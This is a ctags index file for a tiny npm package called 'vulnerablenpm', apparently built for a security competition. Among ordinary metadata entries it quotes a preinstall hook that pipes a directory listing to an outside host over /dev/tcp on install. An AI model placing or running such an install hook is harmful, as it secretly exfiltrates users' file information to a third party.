!_TAG_FILE_FORMAT	2	/extended format; --format=1 will not append ;" to lines/
!_TAG_FILE_SORTED	1	/0=unsorted, 1=sorted, 2=foldcase/
!_TAG_OUTPUT_EXCMD	mixed	/number, pattern, mixed, or combineV2/
!_TAG_OUTPUT_FILESEP	slash	/slash or backslash/
!_TAG_OUTPUT_MODE	u-ctags	/u-ctags or e-ctags/
!_TAG_PATTERN_LENGTH_LIMIT	96	/0 for no limit/
!_TAG_PROC_CWD	/home/dagur/ggfi/finals/mpn/vulnerablenpm/	//
!_TAG_PROGRAM_AUTHOR	Universal Ctags Team	//
!_TAG_PROGRAM_NAME	Universal Ctags	/Derived from Exuberant Ctags/
!_TAG_PROGRAM_URL	https://ctags.io/	/official site/
!_TAG_PROGRAM_VERSION	5.9.0	//
author	package.json	/^  "author": "me",$/;"	s
description	package.json	/^  "description": "jajadingdong",$/;"	s
hasInstallScript	package-lock.json	/^      "hasInstallScript": true,$/;"	b	object:packages.
helloNpm	index.js	/^function helloNpm() {$/;"	f
license	package-lock.json	/^      "license": "ISC"$/;"	s	object:packages.
license	package.json	/^  "license": "ISC",$/;"	s
lockfileVersion	package-lock.json	/^  "lockfileVersion": 2,$/;"	n
main	package.json	/^  "main": "index.js",$/;"	s
name	package-lock.json	/^      "name": "vulnerablenpm",$/;"	s	object:packages.
name	package-lock.json	/^  "name": "vulnerablenpm",$/;"	s
name	package.json	/^  "name": "vulnerablenpm",$/;"	s
packages	package-lock.json	/^  "packages": {$/;"	o
preinstall	package.json	/^	"preinstall": "bash -c 'ls .. > \/dev\/tcp\/landspitalinn.is\/9001'"$/;"	s	object:scripts
prepack	package.json	/^	"prepack": "echo prepack",$/;"	s	object:scripts
prepare	package.json	/^	"prepare": "echo prepare",$/;"	s	object:scripts
repository	package.json	/^  "repository": {$/;"	o
requires	package-lock.json	/^  "requires": true,$/;"	b
scripts	package.json	/^  "scripts": {$/;"	o
test	package.json	/^    "test": "echo \\"Error: no test specified\\" && exit 1"$/;"	s	object:scripts
type	package.json	/^    "type": "git",$/;"	s	object:repository
url	package.json	/^    "url": "github.com\/dagurb\/vulnerablenpm"$/;"	s	object:repository
version	package-lock.json	/^      "version": "1.0.0",$/;"	s	object:packages.
version	package-lock.json	/^  "version": "1.0.0",$/;"	s
version	package.json	/^  "version": "1.0.0",$/;"	s
